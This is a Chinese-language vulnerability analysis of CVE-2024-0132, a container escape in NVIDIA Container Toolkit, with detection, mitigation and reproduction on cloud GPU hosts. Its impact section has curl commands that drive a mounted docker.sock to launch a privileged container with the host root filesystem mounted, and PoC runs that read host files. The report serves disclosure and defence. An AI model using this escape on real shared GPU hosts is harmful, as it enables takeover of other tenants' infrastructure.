一、基本信息
二、组件简介
漏洞产生于 nvidia-container-cli 所依赖的库 libnvidia-container.so 中,二者都属于 libnvidia-container 项目。libnvidia-container 和其他相关工具共同组成了 NVIDIA Container Toolkit。
NVIDIA Container Toolkit是由NVIDIA公司推出的一套工具,用于在容器化环境中实现GPU加速计算。它允许用户在Docker等容器平台中使用NVIDIA GPU,从而在容器中运行需要GPU支持的应用程序,如深度学习训练、推理、科学计算等。
NVIDIA Container Toolkit 主要包含以下组件:
- libnvidia-container:提供了与容器运行时集成的底层库,负责管理GPU设备的挂载、驱动程序和CUDA库。
- nvidia-container-runtime:这是一个容器运行时,扩展了标准的OCI(Open Container Initiative)运行时,使其支持GPU加速功能。
- nvidia-docker2(已弃用):早期用于在Docker容器中使用NVIDIA GPU的插件,现在已被NVIDIA Container Toolkit取代。
三、漏洞作者
1. discoverer
1.1 Shir Tamari
Shir Tamari 是一位经验丰富的安全和技术研究员,专注于漏洞研究和实际黑客技术。他曾服役于 Israel Defense Forces(以色列国防军),目前是云安全公司 Wiz 的研究主管。过去,他曾在研究、开发和产品领域为多家安全公司担任顾问。他挖掘了多个云安全领域的知名漏洞,是 nvidia-container-toolkit 容器逃逸漏洞 CVE-2024-0132 的作者之一。
1.2 Ronen Shustin(ID: Ronen)
Ronen Shustin 是一位经验丰富的漏洞研究员,专注于云安全领域,曾在包括 Wiz、Check Point、以色列 8200 部队等知名组织任职。Ronen 在多个云平台上发现并报告了重要的安全漏洞,如 libnvidia-container CVE-2024-0132 容器逃逸漏洞、Azure PostgreSQL 数据库、GCP Cloud SQL 以及 IBM Cloud Databases for PostgreSQL 等。他在多个安全会议上发表了关于云安全和 Kubernetes 集群安全的演讲,并多次登上微软安全响应中心的安全研究员排行榜。
1.3 Andres Riancho(ID: andresriancho)
Andrés Riancho 是一位专注于攻击性应用安全和培训开发者编写安全代码的专家。他曾在Rapid7担任Web安全总监,领导团队改进了NeXpose的Web应用扫描器。他是开源Web应用安全扫描器w3af的创建者,该工具帮助用户识别和利用Web应用中的漏洞。他还为MercadoLibre和Despegar等拉美独角兽公司提供专业的安全咨询服务。他热衷于在全球的安全和开发者大会上演讲,分享他在Web应用安全、漏洞利用和云安全等领域的丰富经验。他目前居住在阿根廷布宜诺斯艾利斯,并在全球范围内提供专业服务。
2. introducer: Jonathan Calmels(ID: 3XX0)
Jonathan Calmels 是 NVIDIA 的系统软件工程师。他的工作主要侧重于 GPU 数据中心软件和深度学习的超大规模解决方案。
3. fixer: Evan Lezar(ID: elezar)
Evan Lezar 是一位经验丰富的软件工程师,具有商业和学术背景。他在多种编程语言、角色和团队配置方面拥有超过十年的工作经验。Evan 就职于 NVIDIA。他在计算电磁学领域尤其擅长使用 NVIDIA CUDA 进行 GPU 加速,已发表多篇相关论文,并参与多个国际会议。此外,Evan 还积极参与开源项目,贡献于多个与 NVIDIA GPU 管理、Kubernetes 和容器技术相关的项目。他的研究成果不仅推动了学术界的发展,也在工业界得到了广泛应用。
四、漏洞详情
1. 介绍
1.1 相关特性介绍:CUDA 前向兼容
libnvidia-container支持 CUDA前向兼容(CUDA Forward Compatibility),它允许容器在主机驱动程序版本较旧的情况下,使用比主机驱动程序更新的CUDA库,从而使容器化的CUDA应用程序能够运行在更新的CUDA版本上, 而无需更新主机上的NVIDIA驱动。这对需要使用新特性或新版本CUDA的容器化应用程序而言非常有用,同时保持了与主机系统的兼容性和稳定性。
具体来说,libnvidia-container 将会把容器 /usr/local/cuda/compat 目录下较新的CUDA库,挂载到容器 lib 目录。
1.2 漏洞介绍
NVIDIA Container Toolkit 的库 libnvidia-container 在处理 CUDA 前向兼容特性时,会把容器 /usr/local/cuda/compat 目录下的文件挂载到容器 lib 目录(/usr/lib/x86_64-linux-gnu/ 等)。该挂载行为受到软链接攻击影响,可导致任意主机目录被以只读模式挂载到容器内,进而可导致容器逃逸。
2. 影响
2.1 范围
libnvidia-container >= 1.0.0, <= 1.16.1
详细测量结果参见: https://github.com/ssst0n3/poc-cve-2024-0132/issues/2
nvidia-container-toolkit, gpu-operator 因为依赖libnvidia-container而受影响;
nvidia-container-toolkit 支持3种模式:
- legacy: 默认配置,受影响。
- cdi: 可以手动设置,不受影响。
- csv: 可以手动设置,不受影响。(此模式主要针对没有 NVML 可用的基于 Tegra 的系统,官方未提供详细的使用教程,预计使用该模式的用户极少;使用csv模式需要用户手动设置要挂载的文件、设备,不涉及相关特性。)
2.2 危害
可导致任意主机目录被以只读模式挂载到容器内,通过 docker.sock 等文件可调用容器API实现容器逃逸。
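以下给出一个利用思路的示意:docker.sock 是 unix socket,即使以只读方式被 bind 挂载到容器内,仍可与其通信并调用 Docker API,创建并启动一个挂载主机根目录的特权容器(示例沿用后文 PoC 镜像中的挂载路径 /host-run/docker.sock;请求体中的镜像名 ubuntu、容器名 escape 均为假设,仅示意原理):

```sh
# 示意:通过容器内的 docker.sock 调用 Docker API,创建挂载主机根目录的特权容器
curl -s --unix-socket /host-run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Image":"ubuntu","Cmd":["sleep","infinity"],"HostConfig":{"Privileged":true,"Binds":["/:/host"]}}' \
  -X POST "http://localhost/containers/create?name=escape"
# 启动后,新容器内的 /host 即为主机根目录,可进一步通过 exec 接口在其中执行命令
curl -s --unix-socket /host-run/docker.sock -X POST "http://localhost/containers/escape/start"
```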
2.2.1 CVSS3.1 8.6 (by ssst0n3)
8.6 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
2.2.2 CVSS3.1 9.0 (by NVIDIA)
9.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
2.2.3 CVSS3.1 8.3 (by NIST:NVD)
8.3 CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
2.3 利用场景
该漏洞影响允许用户运行任意镜像、并在容器内使用 NVIDIA GPU 的服务,例如共享 GPU 的多租户平台。
五、防御
1. 漏洞存在性检测
可通过以下命令确认是否使用受影响版本。
(1) 查看 /etc/docker/daemon.json 或 /etc/containerd/config.toml 文件中是否包含 nvidia 字段。
以下示例输出说明该环境使用了 NVIDIA Container Toolkit:
root@localhost:~# cat /etc/docker/daemon.json |grep nvidia
"nvidia": {
"path": "nvidia-container-runtime"
root@localhost:~# cat /etc/containerd/config.toml |grep nvidia
"/usr/bin/nvidia-container-runtime"
(2) 执行相关命令,如 nvidia-container-runtime --version 等。
以下示例说明,使用的版本为 1.16.2, 不受此漏洞影响。
root@localhost:~# nvidia-container-runtime --version
NVIDIA Container Runtime version 1.16.2
commit: a5a5833c14a15fd9c86bcece85d5ec6621b65652
spec: 1.2.0
runc version 1.1.12-0ubuntu2~22.04.1
spec: 1.0.2-dev
go: go1.21.1
libseccomp: 2.5.3
2. 修复建议
英伟达已发布修复版本,升级至 v1.16.2 及以上版本可以修复。
可参考官方安装指导:https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html
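以基于 apt 的系统为例,一个可能的升级操作示意如下(包名与前文安装命令一致,具体版本号以官方发布说明为准):

```sh
# 示意:将 NVIDIA Container Toolkit 相关软件包升级至修复版本 1.16.2
apt-get update
apt-get install -y \
    libnvidia-container1=1.16.2-1 \
    libnvidia-container-tools=1.16.2-1 \
    nvidia-container-toolkit-base=1.16.2-1 \
    nvidia-container-toolkit=1.16.2-1
# 升级后重启 docker 使配置生效
systemctl restart docker
```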
3. 规避措施
- 避免执行不可信的镜像(运行前可先检查镜像内容,参考本节末尾的示例)
- 或使用CDI方式使用gpu, 详见官方文档: https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html
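针对"避免执行不可信的镜像",下面给出一个简单的排查思路示意(非官方检测方法,镜像名 untrusted-image 为假设):先将镜像文件系统导出,再检查 /usr/local/cuda/compat 目录中是否存在指向镜像外路径的符号链接。

```sh
# 示意:导出镜像文件系统,检查 /usr/local/cuda/compat 下的条目
# tar -tv 输出中以 "l" 开头且带有 "->" 的条目即为符号链接
docker create --name cve-check untrusted-image true
docker export cve-check | tar -tvf - | grep 'usr/local/cuda/compat'
docker rm cve-check
```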
4. 漏洞利用检测
(1) 漏洞利用时会执行 mount 系统调用,可以通过该系统调用的参数检测。
(2) 也可以检测容器进程对主机文件的访问。
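例如,可借助 auditd 对 mount 系统调用做审计记录,作为一种可能的检测思路示意(规则中的 key 为示例值):

```sh
# 示意:为 mount 系统调用添加审计规则,并检索相关记录
auditctl -a always,exit -F arch=b64 -S mount -k cve-2024-0132-mount
ausearch -k cve-2024-0132-mount --interpret
```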
六、漏洞复现
1. nvidia-container-toolkit
- 复现环境: 华为云香港ECS(ubuntu 22.04, nvidia driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1
- 复现步骤: 运行PoC镜像
- 目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API
更多版本的影响情况测量,详见 https://github.com/ssst0n3/poc-cve-2024-0132/issues/2
1.1 复现环境
购买华为云香港节点弹性云服务器,我购买的具体配置如下
- 计费模式:按需计费
- 区域/可用区:中国-香港 | 随机分配
- 实例规格:GPU加速型 | pi2.2xlarge.4 | 8vCPUs | 32GiB | GPU显卡: 1 * NVIDIA Tesla T4 / 1 * 16GiB
- 操作系统镜像:Ubuntu 22.04 server 64bit with Tesla Driver 470.223.02 and CUDA 11.4
$ ssh wanglei-gpu3
root@wanglei-gpu3:~# nvidia-smi
Tue Oct 15 11:13:33 2024
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02 Driver Version: 470.223.02 CUDA Version: 11.4 |
|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 |
| N/A 30C P8 9W / 70W | 0MiB / 15109MiB | 0% Default |
| | | N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+
下面开始安装docker和nvidia-container-toolkit
root@wanglei-gpu3:~# apt update && apt install docker.io -y
root@wanglei-gpu3:~# curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \
  && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
root@wanglei-gpu3:~# apt-get update && \
  apt-get install -y libnvidia-container1=1.16.1-1 \
    libnvidia-container-tools=1.16.1-1 \
    nvidia-container-toolkit-base=1.16.1-1 \
    nvidia-container-toolkit=1.16.1-1
配置容器运行时 nvidia
root@wanglei-gpu3:~# nvidia-ctk runtime configure --runtime=docker
WARN[0000] Ignoring runtime-config-override flag for docker
INFO[0000] Config file does not exist; using empty config
INFO[0000] Wrote updated config to /etc/docker/daemon.json
INFO[0000] It is recommended that docker daemon be restarted.
root@wanglei-gpu3:~# systemctl restart docker
环境信息如下
root@wanglei-gpu3:~# nvidia-container-cli --version
cli-version: 1.16.1
lib-version: 1.16.1
build date: 2024-07-23T14:57+00:00
build revision: 4c2494f16573b585788a42e9c7bee76ecd48c73d
build compiler: x86_64-linux-gnu-gcc-7 7.5.0
build platform: x86_64
build flags: -D_GNU_SOURCE -D_FORTIFY_SOURCE=2 -DNDEBUG -std=gnu11 -O2 -g -fdata-sections -ffunction-sections -fplan9-extensions -fstack-protector -fno-strict-aliasing -fvisibility=hidden -Wall -Wextra -Wcast-align -Wpointer-arith -Wmissing-prototypes -Wnonnull -Wwrite-strings -Wlogical-op -Wformat=2 -Wmissing-format-attribute -Winit-self -Wshadow -Wstrict-prototypes -Wunreachable-code -Wconversion -Wsign-conversion -Wno-unknown-warning-option -Wno-format-extra-args -Wno-gnu-alignof-expression -Wl,-zrelro -Wl,-znow -Wl,-zdefs -Wl,--gc-sections
root@wanglei-gpu3:~#
root@wanglei-gpu3:~# nvidia-container-cli info
NVRM version: 470.223.02
CUDA version: 11.4
Device Index: 0
Device Minor: 0
Model: Tesla T4
Brand: Nvidia
GPU UUID: GPU-03ef96a1-75d6-9917-ed12-4db7f79bfa4b
Bus Location: 00000000:00:0d.0
Architecture: 7.5
root@wanglei-gpu3:~#
root@wanglei-gpu3:~# docker info
Client:
Version: 24.0.7
Context: default
Debug Mode: false
Server:
Containers: 0
Running: 0
Paused: 0
Stopped: 0
Images: 0
Server Version: 24.0.7
Storage Driver: overlay2
Backing Filesystem: extfs
Supports d_type: true
Using metacopy: false
Native Overlay Diff: true
userxattr: false
Logging Driver: json-file
Cgroup Driver: systemd
Cgroup Version: 2
Plugins:
Volume: local
Network: bridge host ipvlan macvlan null overlay
Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
Swarm: inactive
Runtimes: io.containerd.runc.v2 nvidia runc
Default Runtime: runc
Init Binary: docker-init
containerd version:
runc version:
init version:
Security Options:
apparmor
seccomp
Profile: builtin
cgroupns
Kernel Version: 5.15.0-76-generic
Operating System: Ubuntu 22.04.2 LTS
OSType: linux
Architecture: x86_64
CPUs: 8
Total Memory: 31.15GiB
Name: wanglei-gpu3
ID: bc9d2464-60ee-458d-93a0-fab77847a4b3
Docker Root Dir: /var/lib/docker
Debug Mode: false
Experimental: false
Insecure Registries:
127.0.0.0/8
Live Restore Enabled: false
1.2 漏洞复现
使用预先构建的poc镜像 ssst0n3/poc-cve-2024-0132 , 或临时构建。
root@wanglei-gpu3:~# git clone https://github.com/ssst0n3/poc-cve-2024-0132.git
root@wanglei-gpu3:~# cd poc-cve-2024-0132
root@wanglei-gpu3:~/poc-cve-2024-0132# docker build -t ssst0n3/poc-cve-2024-0132 .
...
root@wanglei-gpu3:~/poc-cve-2024-0132# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132
+ cat /host/etc/hostname
wanglei-gpu3
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
[{"Id":"6dac93a4b9aaa6e2db5bed64f550d111e6e9604375e3210b46b59b095635290f","Names":["/nifty_booth"],"Image":"ssst0n3/poc-cve-2024-0132","ImageID":"sha256:53f3d5c92e144343851ec800aa7a0af201517262498519cc4dfd53688da9b112","Command":"/bin/sh -c /entrypoint.sh","Created":1728996664,"Ports":[],"Labels":{"org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.version":"24.04"},"State":"running","Status":"Up Less than a second","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"72649d2ea91c5c657b26de4af617b491e8f09bf9c2e5e8a44695ff10e68191b6","EndpointID":"be81eb91bfafd69bb442f3ccf9790ff5da9ae9ef42ad643aa4a686c3040f404b","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[]}]
2. gpu-operator
- 复现环境: 华为云香港CCE Standard(k8s v1.30) + docker v24.0.9 + gpu-operator v24.6.1
- 复现步骤: 运行PoC镜像
- 目标现象: 显示在容器内访问了主机文件,可通过docker.sock调用docker API
测试 gpu-operator 的目的是证明:它受影响的原因在于其安装的 nvidia-container-toolkit,因此未对 gpu-operator 的其他版本进行测量。
2.1 复现环境
购买华为云香港节点CCE集群,我购买的具体配置如下
- 计费模式:按需计费
- 集群版本:v1.30
- 添加节点:
  - 计费模式:按需计费
  - 区域/可用区:中国-香港 | 随机分配
  - 实例规格:GPU加速型 | pi2.2xlarge.4 | 8vCPUs | 32GiB | GPU显卡: 1 * NVIDIA Tesla T4 / 1 * 16GiB
  - 镜像:Ubuntu 22.04
root@wanglei-k8s-gpu-02862:~# lspci |grep NVIDIA
00:0d.0 3D controller: NVIDIA Corporation TU104GL [Tesla T4] (rev a1)
下面开始安装 gpu-operator
$ scp wanglei-k8s-gpu-kubeconfig.yaml wanglei-k8s-gpu-02862:
$ ssh wanglei-k8s-gpu-02862
root@wanglei-k8s-gpu-02862:~# curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3 && chmod 700 get_helm.sh && ./get_helm.sh
Downloading https://get.helm.sh/helm-v3.16.3-linux-amd64.tar.gz
Verifying checksum... Done.
Preparing to install helm into /usr/local/bin
helm installed into /usr/local/bin/helm
root@wanglei-k8s-gpu-02862:~# helm repo add nvidia https://helm.ngc.nvidia.com/nvidia && helm repo update
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
"nvidia" has been added to your repositories
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "nvidia" chart repository
Update Complete. ⎈Happy Helming!⎈
root@wanglei-k8s-gpu-02862:~# helm install --wait --generate-name -n gpu-operator --create-namespace nvidia/gpu-operator --version=v24.6.1
WARNING: Kubernetes configuration file is group-readable. This is insecure. Location: /root/.kube/config
WARNING: Kubernetes configuration file is world-readable. This is insecure. Location: /root/.kube/config
NAME: gpu-operator-1733143549
LAST DEPLOYED: Mon Dec 2 20:45:52 2024
NAMESPACE: gpu-operator
STATUS: deployed
REVISION: 1
TEST SUITE: None
遇到 Init:CrashLoopBackOff 错误,不清楚原因。删除 pod 等待重建即可。
root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operator
NAME READY STATUS RESTARTS AGE
gpu-feature-discovery-nmz44 0/1 Init:0/1 0 4m42s
gpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv 1/1 Running 0 6m3s
gpu-operator-1733143549-node-feature-discovery-master-86985w2n8 1/1 Running 0 6m3s
gpu-operator-1733143549-node-feature-discovery-worker-5c7cp 1/1 Running 0 6m3s
gpu-operator-77fdfcd757-4gxq4 1/1 Running 0 6m3s
nvidia-container-toolkit-daemonset-xnfjx 1/1 Running 0 4m42s
nvidia-dcgm-exporter-9d8bp 0/1 Init:0/1 0 4m42s
nvidia-device-plugin-daemonset-dz84j 0/1 Init:0/1 0 4m42s
nvidia-driver-daemonset-w2xmw 1/1 Running 0 5m33s
nvidia-operator-validator-kjc2x 0/1 Init:CrashLoopBackOff 3 (23s ago) 4m42s
root@wanglei-k8s-gpu-02862:~# kubectl delete pod -n gpu-operator nvidia-operator-validator-kjc2x
root@wanglei-k8s-gpu-02862:~# kubectl get pods -n gpu-operator
NAME READY STATUS RESTARTS AGE
gpu-feature-discovery-nmz44 1/1 Running 0 8m7s
gpu-operator-1733143549-node-feature-discovery-gc-c9474d8bfvxfv 1/1 Running 0 9m28s
gpu-operator-1733143549-node-feature-discovery-master-86985w2n8 1/1 Running 0 9m28s
gpu-operator-1733143549-node-feature-discovery-worker-5c7cp 1/1 Running 0 9m28s
gpu-operator-77fdfcd757-4gxq4 1/1 Running 0 9m28s
nvidia-container-toolkit-daemonset-xnfjx 1/1 Running 0 8m7s
nvidia-cuda-validator-895qp 0/1 Completed 0 2m15s
nvidia-dcgm-exporter-9d8bp 1/1 Running 0 8m7s
nvidia-device-plugin-daemonset-2s7z2 1/1 Running 0 22s
nvidia-driver-daemonset-w2xmw 1/1 Running 0 8m58s
nvidia-operator-validator-gd74c 1/1 Running 0 2m17s
环境信息如下
root@wanglei-k8s-gpu-02862:~# kubectl exec -n gpu-operator nvidia-driver-daemonset-w2xmw nvidia-smi
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Mon Dec 2 12:57:22 2024
+-----------------------------------------------------------------------------------------+
| NVIDIA-SMI 550.90.07 Driver Version: 550.90.07 CUDA Version: 12.4 |
|-----------------------------------------+------------------------+----------------------+
| GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|=========================================+========================+======================|
| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 |
| N/A 28C P8 9W / 70W | 1MiB / 15360MiB | 0% Default |
| | | N/A |
+-----------------------------------------+------------------------+----------------------+
+-----------------------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=========================================================================================|
| No running processes found |
+-----------------------------------------------------------------------------------------+
2.2 漏洞复现
root@wanglei-k8s-gpu-02862:~# cat poc-cve-2024-0132.yaml
apiVersion: v1
kind: Pod
metadata:
name: poc-cve-2024-0132
spec:
restartPolicy: OnFailure
containers:
- name: poc-cve-2024-0132
image: "docker.io/ssst0n3/poc-cve-2024-0132:latest"
imagePullPolicy: IfNotPresent
resources:
limits:
nvidia.com/gpu: 1
root@wanglei-k8s-gpu-02862:~# kubectl apply -f poc-cve-2024-0132.yaml
pod/poc-cve-2024-0132 created
root@wanglei-k8s-gpu-02862:~# kubectl logs poc-cve-2024-0132
+ cat /host/etc/hostname
wanglei-k8s-gpu-02862
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 77281 0 77281 0 0 12.6M 0 --:--:-- --:--:-- --:--:-- 14.7M
[{"Id":"5106c279c3a900712370fccaf6d0ee5e8cb40673ca5886a75a9265f7853e5f05","Names":["/k8s_poc-cve-2024-0132_poc-cve-2024-0132_default_09203b3a-10e4-490a-8f86-abdc1b36c8ae_0"],"Image":"sha256:5fa3c2349168a5c8b3927907399ba19e500d8d86e5c84315
...
3. nvidia-container-toolkit(CDI模式): 不受影响
- 复现环境: 华为云香港ECS(ubuntu 22.04, nvidia driver) + docker v27.1.0 + nvidia-container-toolkit v1.16.1
- 复现步骤: 运行PoC镜像
- 目标现象: 无法在容器内访问主机文件,也无法通过 docker.sock 调用 docker API(验证 CDI 模式不受影响)
3.1 复现环境
环境同 1.1 节。
按照1.1节:
- 安装docker和nvidia-container-toolkit
- 配置容器运行时
$ apt update && apt install docker.io -y
$ curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \
  && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \
    sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \
    tee /etc/apt/sources.list.d/nvidia-container-toolkit.list
$ apt-get update && \
  apt-get install -y libnvidia-container1=1.16.1-1 \
    libnvidia-container-tools=1.16.1-1 \
    nvidia-container-toolkit-base=1.16.1-1 \
    nvidia-container-toolkit=1.16.1-1
$ nvidia-ctk runtime configure --runtime=docker
$ systemctl restart docker
安装完毕后设置CDI模式
$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml
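较新版本的 nvidia-ctk 提供了 cdi list 子命令,可用于确认生成的 CDI 设备名是否可用(此处仅示意用法,输出因环境而异):

```sh
# 示意:列出当前已生成的 CDI 设备,确认 /etc/cdi/nvidia.yaml 已生效
nvidia-ctk cdi list
```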
3.2 漏洞复现: 无法利用
root@wanglei-gpu:~# docker run --rm -ti --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ssst0n3/poc-cve-2024-0132:latest
+ cat /host/etc/hostname
cat: /host/etc/hostname: Not a directory
+ curl --unix-socket /host-run/docker.sock http://localhost/containers/json
curl: (7) Failed to connect to localhost port 80 after 0 ms: Couldn't connect to server
七、漏洞分析
1. 原始特性分析
1.1 在容器中使用 nvidia gpu
可参考官方文档安装、使用nvidia gpu容器。nvidia-container-toolkit 借助 runc hook 在容器启动前,挂载相关必要驱动。
- https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/install-guide.html
- https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/sample-workload.html
$ docker run --rm --runtime=nvidia --gpus all ubuntu nvidia-smi
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02 Driver Version: 470.223.02 CUDA Version: 11.4 |
|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 |
| N/A 29C P8 9W / 70W | 0MiB / 15109MiB | 0% Default |
| | | N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+
1.2 nvidia-container-toolkit cuda 前向兼容特性
- 向前兼容性(Forward Compatibility):在计算机科学和软件工程中,向前兼容性是指一个系统、产品或标准能够与未来的版本协同工作的能力。也就是说,现有的软件或硬件能够在未来更新后,仍然保持功能或兼容性。
  - 示例:一个使用旧版本编译的程序,能够在新版本的环境中运行。
- 向后兼容性(Backward Compatibility):是指新版本的系统、产品或标准能够与旧版本的组件协同工作的能力。
  - 示例:一个新版本的软件能够读取旧版本的数据文件。
在 NVIDIA 的官方文档 "CUDA Compatibility Guide"(https://docs.nvidia.com/deploy/cuda-compatibility/index.html) 中,明确提到了 CUDA 的向前兼容性,强调应用程序能够在未来版本的 CUDA 驱动程序和硬件上运行。
★
"Forward Compatibility: Applications compiled on an earlier CUDA toolkit version can run on newer CUDA drivers and, in some cases, newer GPUs."
NVIDIA 在其文档中还提到,CUDA Runtime 提供了向前兼容性,允许应用程序在使用较新版本驱动程序的系统上运行。
★
"The CUDA runtime built into the CUDA driver guarantees binary compatibility and backward compatibility. Applications compiled against a particular version of the CUDA runtime can therefore run without recompilation on newer CUDA-capable GPUs and on systems with newer drivers."
具体来说,libnvidia-container 将会把容器 /usr/local/cuda/compat 目录下较新的CUDA库,挂载到容器 lib 目录。
$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 cat /proc/self/mountinfo |grep compat
677 652 0:48 /usr/local/cuda-12.6/compat/libcuda.so.560.35.03 /usr/lib/x86_64-linux-gnu/libcuda.so.560.35.03 ro,nosuid,nodev,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/7PESVCWGEYV5EAUFQQOU54JC5I:/var/lib/docker/overlay2/l/PIMQYFKPYMVGLM7JIYDNWWQNMV:/var/lib/docker/overlay2/l/BOOUOLOLY4GM525O7PGZYXHWAR:/var/lib/docker/overlay2/l/JFDVXPNFZHK6MO35W275FXWJK2:/var/lib/docker/overlay2/l/DHPPA554ZRQ3RMXBAC4TCQ2ONI:/var/lib/docker/overlay2/l/7VXIOP6JUX5AQWZDCES4OSMUE3:/var/lib/docker/overlay2/l/VXIMXECSGJPSZSTCV4L3F5SSVF:/var/lib/docker/overlay2/l/GNHB2U3KK74XBRHDNTTRBPLO5V:/var/lib/docker/overlay2/l/CPLKLXQBHMU2HSD2KH7QST3XPC:/var/lib/docker/overlay2/l/5I4CMPNMDVNB4OH6B3LTCLKUX5:/var/lib/docker/overlay2/l/MZVFHZWHWZ6WESPEACUAGYRIW2,upperdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/diff,workdir=/var/lib/docker/overlay2/a2f1240f551528f47be90b6b6c7e923470009998687bb7d77ab112c19e325f6e/work
...
$ docker run --rm --runtime=nvidia --gpus all nvidia/cuda:12.6.2-cudnn-runtime-ubuntu24.04 nvidia-smi
==========
== CUDA ==
==========
CUDA Version 12.6.2
Container image Copyright (c) 2016-2023, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
This container image and its contents are governed by the NVIDIA Deep Learning Container License.
By pulling and using the container, you accept the terms and conditions of this license:
https://developer.nvidia.com/ngc/nvidia-deep-learning-container-license
A copy of this license is made available in this container at /NGC-DL-CONTAINER-LICENSE for your convenience.
Tue Nov 26 12:40:00 2024
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.223.02 Driver Version: 470.223.02 CUDA Version: 12.6 |
|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla T4 On | 00000000:00:0D.0 Off | 0 |
| N/A 29C P8 9W / 70W | 0MiB / 15109MiB | 0% Default |
| | | N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+
1.3 CDI
根据"Support for Container Device Interface — NVIDIA Container Toolkit documentation"(https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html#):
从 v1.12.0 版本开始,NVIDIA 容器工具包支持生成容器设备接口(CDI)规范。CDI 是一个开放的容器运行时规范,它抽象了对设备(如 NVIDIA GPU)的访问含义,并在各个容器运行时中标准化了访问方式。流行的容器运行时可以读取并处理这一规范,以确保设备在容器中可用。CDI 简化了对 NVIDIA GPU 等设备的支持添加,因为该规范适用于所有支持 CDI 的容器运行时。
